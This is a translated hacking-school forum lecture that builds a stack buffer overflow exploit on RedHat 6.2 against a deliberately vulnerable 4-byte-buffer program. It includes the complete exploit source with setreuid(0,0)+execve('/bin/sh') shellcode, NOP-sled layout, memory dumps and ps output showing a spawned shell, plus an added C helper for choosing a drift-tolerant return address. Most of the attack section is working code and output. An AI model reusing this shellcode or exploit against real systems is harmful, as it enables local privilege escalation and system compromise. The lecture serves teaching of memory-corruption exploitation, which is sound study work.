buff3r
[Original] Building a BOF exploit on RedHat 6.2 - The Second -

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=1438


The exploit we built last time did all of its work inside the vulnerable program's own buffer.
This time we will exploit a program that allocates only 4 bytes for buf.
vuln.c
#include <stdio.h>
#include <string.h>
#include "dumpcode.h"
int main(int argc,char *argv[])
{
        char buf[4];  // only 4 bytes are allocated.
                      // STACK layout: [buf(4)][sfp(4)][ret(4)]
                      // the space we control before ret is only 8 bytes,
                      // so the method from last time cannot work here.
        strcpy(buf,argv[1]);   // no length check: argv[1] overflows buf, sfp and ret
        dumpcode(buf,500);     // dump 500 bytes starting at buf (helper from dumpcode.h)
        return 0;
}

So how do we make the attack succeed? There are two ways:
1. An exploit using environment variables
2. An exploit using NOPs
(RTL is left out for now.. heh)
This lecture uses the second method.
How do we fit NOPs in when there are only 8 bytes??
The trick is simple: put the NOPs and the shellcode after ret, then make ret point anywhere inside the NOPs. strcpy() keeps copying argv[1] past ret, so everything after the first 12 bytes lands beyond the saved return address, and execution slides down the NOPs into the shellcode.
Stack layout for the attack:
[ garbage (8 bytes) ][ RET (4 bytes) ][ NOP x 200 (200 bytes) ][ Shellcode ]
                          |                  ^
                          +------------------+   RET points into the NOP sled

Lay it out like this.
First, let's find the address where the NOPs after ret will land.
[test@localhost test]$ ./vuln `perl -e 'print "\x90"x600'`
0xbffff904  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff914  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff924  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff934  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff944  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff954  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff964  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff974  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff984  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff994  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9a4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9b4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9c4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9d4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9e4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9f4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa04  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa14  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa24  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa34  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa44  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa54  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa64  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa74  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa84  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffa94  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffaa4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffab4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffac4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffad4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffae4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffffaf4  90 90 90 90                    

There's no end of space, is there +-+
Let's use 0xbffff924. Any address inside the run of 0x90 bytes after ret would do, but pick one well inside the sled rather than at its edge: buf does not sit at exactly the same address every run (in the exploit run below it is at 0xbffff8d4), and the 200-byte sled is what absorbs that shift. The address must also contain no 0x00 byte, or strcpy() would stop copying right there.
ex.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68"; // setreuid(0,0) + execve("/bin/sh") shellcode, 46 bytes, no NUL bytes
int main(int argc, char *argv[])
{
        int i;
        long ret, *addr_ptr;     // long is 4 bytes on this 32-bit system
        char *buffer, *ptr;
        ret = 0xbffff924;  // the RET value we will use (inside the NOP sled)
        buffer = malloc(600);
        ptr = buffer;
        addr_ptr = (long *) ptr;
        for(i=0; i < 600; i+=4)
        { *(addr_ptr++) = ret; }  // fill all 600 bytes with ret
        for(i=0; i < 8; i++)
        { buffer[i] = '\x41'; } // overwrite the first 8 bytes (buf + sfp) with \x41 (A)
        ptr = buffer + 12; // the stack looks like [A x 8 (8 bytes)][RET (4 bytes)],
                           // so the NOPs start right after ret, at buffer + 12.
        for(i=0; i < 200; i++)
        { *(ptr++) = '\x90'; }   // write the NOP sled
        ptr = buffer + 212; // where the shellcode goes
        for(i=0; i < strlen(shellcode); i++)
        { *(ptr++) = shellcode[i]; }   // shellcode right after RET and the NOPs

        buffer[600-1] = 0;        // terminate so strcpy() stops here
        execl("./vuln", "vuln", buffer, (char *)0);   // run vuln with the payload as argv[1]
        perror("execl");          // only reached if the exec itself fails
        free(buffer);
        return 1;
}
Before the attack:
[test@localhost test]$ ps
  PID TTY          TIME CMD
  681 pts/0    00:00:00 bash
  732 pts/0    00:00:00 bash2
  741 pts/0    00:00:00 ps

Attack:
[test@localhost test]$ ./ex
0xbffff8d4  41 41 41 41 41 41 41 41 24 f9 ff bf 90 90 90 90   AAAAAAAA$.......
0xbffff8e4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff8f4  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff904  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff914  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff924  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff934  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff944  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff954  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff964  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff974  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff984  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff994  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90   ................
0xbffff9a4  90 90 90 90 31 c0 b0 46 31 db 31 c9 cd 80 eb 16   ....1..F1.1.....
0xbffff9b4  5b 31 c0 88 43 07 89 5b 08 89 43 0c b0 0b 8d 4b   [1..C..[..C....K
0xbffff9c4  08 8d 53 0c cd 80 e8 e5 ff ff ff 2f 62 69 6e 2f   ..S......../bin/
0xbffff9d4  73 68 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   sh..$...$...$...
0xbffff9e4  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffff9f4  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa04  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa14  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa24  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa34  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa44  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa54  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa64  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa74  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa84  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffa94  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffaa4  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffab4  24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf   $...$...$...$...
0xbffffac4  24 f9 ff bf                                       $...
bash$
After the attack:
bash$ ps
  PID TTY          TIME CMD
  681 pts/0    00:00:00 bash
  732 pts/0    00:00:00 bash2
  739 pts/0    00:00:00 sh // the attack succeeded: this is the shell spawned by the shellcode
  740 pts/0    00:00:00 ps
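As an added check (this block is example code written for this page, not code from the original post), the following C program builds the same [garbage][RET][NOP][shellcode] layout that ex.c produces and answers the two questions ex.c simply hard-codes: does a candidate RET land inside the sled for each buf address seen in the dumps above (0xbffff904 in the probe run, 0xbffff8d4 in the exploit run), and does the payload survive strcpy() intact, i.e. contain no NUL byte before the end of the shellcode. The function and constant names are this page's own; the two buf addresses are taken from the dump output above, and the shellcode is the one from ex.c.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Offsets from the start of buf, exactly as ex.c lays them out:
 *   [junk 8][RET 4][NOP x 200][shellcode][RET repeated ...][NUL at 599]
 */
#define JUNK_LEN      8
#define RET_OFF       8
#define SLED_OFF     12
#define SLED_LEN    200
#define SC_OFF      (SLED_OFF + SLED_LEN)   /* 212 */
#define PAYLOAD_LEN 600

/* The setreuid(0,0) + execve("/bin/sh") shellcode from ex.c (46 bytes, no NUL). */
static const unsigned char shellcode[] =
    "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
    "\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
    "\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
    "\x68";
#define SC_LEN (sizeof(shellcode) - 1)

/* Store v little-endian, the byte order a 32-bit x86 reads the saved EIP in. */
static void put_le32(unsigned char *p, uint32_t v)
{
    p[0] = v & 0xff; p[1] = (v >> 8) & 0xff;
    p[2] = (v >> 16) & 0xff; p[3] = v >> 24;
}

/* 1 if any byte of v is 0x00: strcpy() would stop copying at that byte. */
int has_nul_byte(uint32_t v)
{
    return !(v & 0xffu) || !(v & 0xff00u) || !(v & 0xff0000u) || !(v & 0xff000000u);
}

/* Build the 600-byte payload the way ex.c does. Returns the number of bytes
 * strcpy() will actually copy into buf, or -1 if an embedded NUL truncates
 * the copy before the end of the shellcode (the overflow could not work). */
int build_payload(unsigned char *out, uint32_t ret)
{
    size_t i, copied;
    for (i = 0; i + 4 <= PAYLOAD_LEN; i += 4) put_le32(out + i, ret);
    memset(out, 'A', JUNK_LEN);                 /* buf(4) + sfp(4) */
    memset(out + SLED_OFF, 0x90, SLED_LEN);     /* NOP sled right after ret */
    memcpy(out + SC_OFF, shellcode, SC_LEN);    /* shellcode after the sled */
    out[PAYLOAD_LEN - 1] = 0;
    copied = strlen((const char *)out);
    return copied < SC_OFF + SC_LEN ? -1 : (int)copied;
}

/* Bytes strcpy() would copy for this ret (-1 if truncated), and the byte at
 * a given offset of that payload (-1 if the payload is unusable). */
int payload_len(uint32_t ret)
{
    unsigned char p[PAYLOAD_LEN];
    return build_payload(p, ret);
}
int payload_byte(uint32_t ret, size_t off)
{
    unsigned char p[PAYLOAD_LEN];
    if (off >= PAYLOAD_LEN || build_payload(p, ret) < 0) return -1;
    return p[off];
}

/* buf_addr is the address dumpcode printed for buf; the sled then occupies
 * [buf_addr+12, buf_addr+212), and ret must land inside it. */
int ret_hits_sled(uint32_t buf_addr, uint32_t ret)
{
    return ret >= buf_addr + SLED_OFF && ret < buf_addr + SC_OFF;
}

/* Pick a ret that lands in the sled for every observed buf address: take the
 * intersection of the sled windows, start at its middle and step away from
 * any value containing a NUL byte. Returns 0 if no such ret exists. */
int pick_ret(const uint32_t *bufs, size_t n, uint32_t *ret_out)
{
    uint32_t lo = 0, hi = 0xffffffffu, mid, v;
    size_t i;
    for (i = 0; i < n; i++) {
        if (bufs[i] + SLED_OFF > lo) lo = bufs[i] + SLED_OFF;
        if (bufs[i] + SC_OFF < hi)   hi = bufs[i] + SC_OFF;
    }
    if (lo >= hi) return 0;                     /* windows do not overlap */
    mid = lo + (hi - lo) / 2;
    for (v = mid; v < hi; v++)
        if (!has_nul_byte(v)) { *ret_out = v; return 1; }
    for (v = mid; v > lo; v--)
        if (!has_nul_byte(v - 1)) { *ret_out = v - 1; return 1; }
    return 0;
}

/* Two-observation convenience wrapper: a ret common to both buf addresses, or 0. */
uint32_t common_ret(uint32_t buf_a, uint32_t buf_b)
{
    uint32_t bufs[2], ret;
    bufs[0] = buf_a; bufs[1] = buf_b;
    return pick_ret(bufs, 2, &ret) ? ret : 0;
}

int main(void)
{
    /* buf addresses observed in the two dumpcode runs in this post */
    uint32_t seen[2] = { 0xbffff904u, 0xbffff8d4u }, ret;
    printf("0xbffff924 hits sled at 0xbffff904: %d, at 0xbffff8d4: %d\n",
           ret_hits_sled(seen[0], 0xbffff924u), ret_hits_sled(seen[1], 0xbffff924u));
    if (pick_ret(seen, 2, &ret))
        printf("safest common ret: 0x%08x, strcpy copies %d bytes\n", ret, payload_len(ret));
    return 0;
}
```

Running it shows that 0xbffff924 falls inside the sled for both observed buf addresses, which is why the hard-coded value in ex.c still worked even though buf had moved by 0x30 bytes between the two runs; pick_ret() returns the middle of the common window, the value least sensitive to further drift. The payload check also reproduces a detail visible in the exploit dump: the shellcode ends at offset 257, so the ret slot at 256 survives only as its last two bytes (ff bf), exactly as the line at 0xbffff9d4 shows.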


  Hit : 7649     Date : 2010/03/18 06:55



    
별빛을담아  You are now watching buff3r play with buffers.
            Anyway, comment first, read later.  2010/03/18
초콜렛나인  A buffer playing with a buffer lol  2010/03/18
kjwon15     So it's a scene of playing with NOPs..  2010/03/23
zzguswhd    Which.. compiler did you use?;  2010/07/26
Cpgroot     Got some good info, thanks ..  2010/08/18